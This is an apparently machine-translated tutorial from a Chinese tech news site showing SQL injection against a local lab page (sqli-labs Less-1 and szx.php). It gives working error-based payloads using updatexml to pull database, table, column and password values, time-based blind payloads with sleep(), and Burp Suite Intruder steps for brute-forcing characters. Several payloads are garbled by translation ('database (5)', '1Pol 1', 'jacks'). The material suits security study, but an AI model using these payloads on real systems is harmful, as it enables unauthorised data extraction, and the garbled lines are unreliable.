Shulou(Shulou.com)06/01 Report--

Today, I will talk to you about how sql injection loopholes report wrong injection and blind injection. Many people may not know much about it. In order to make you understand better, the editor has summarized the following content for you. I hope you can get something according to this article.

Environment: szx.php for the first pass of sqli

First, report error injection

1. Get the database name, and obtain different database names by modifying the values after limit.

Http://192.168.1.129/sqli/Less-1/?id=1' and updatexml (1, (select concat (0x7e, (schema_name), 0x7e) FROM information_schema.schemata limit 2), 1)-- +

2. Get the tables in the database, specify the database name, and obtain different table names by modifying the values after limit.

Http://127.0.0.1/sqli/Less-1/?id=1' and updatexml (1, (select concat (0x7e, (table_name), 0x7e) from information_schema.tables where table_schema='jay' limit 2), 1)-- +

3. Get the table field, specify the table name and convert it to hexadecimal form, and obtain different table fields by modifying the values after limit.

Http://192.168.1.129/sqli/Less-1/?id=1' and updatexml (1, (select concat (0x7e, (column_name), 0x7e) from information_schema.columns where table_name=0x75736572 limit 1), 1)-- +

4. Get the field content, specify the database field and table name, and obtain different field contents by modifying the values after limit.

Http://192.168.1.129/sqli/Less-1/?id=1' and updatexml (1, (select concat (0x7e, pass,0x7e) from jay.user limit 1), 1)-- +

Second, blind injection

1. Get the database length. If the data length is greater than or equal to 2, wait 5 seconds, and if it is less than 2, do nothing. Modify this value to determine the database length.

Http://192.168.1.129/php/szx.php?id=1 and (select (if (length (database ()) > 2 database (5), null)) #

2. Get the database name

If the first one on the left of the data name is' jmarker, stay one more side, if not stay 5 seconds more, modify the character to determine the database name.

Http://192.168.1.129/php/szx.php?id=1 and If (left (database (), 1) = 'jacks, 1, sleep (5))

If the first one on the left of the data name is 106, and the ascii code is' jshield, stay one more side. If you don't stay for 5 seconds more, modify the character to determine the database name.

Http://192.168.1.129/php/szx.php?id=1 and If (ascii (substr (database (), 1Pol 1)) = 106 sleep (1))

3. Burpsuit detection (blind injection)

1. Grab the packet and send it to the Intruder module, and set the variable

2. Set amurz in payload,ASCII to 97-122and set step size to 1.

3. Start attack, only 106time is 2000, other time is more than 5000, indicating that the ASCII code of the first digit is 106, and so on to obtain the information of other locations.

After reading the above, do you have any further understanding of sql injection vulnerabilities, error injection and blind injection? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.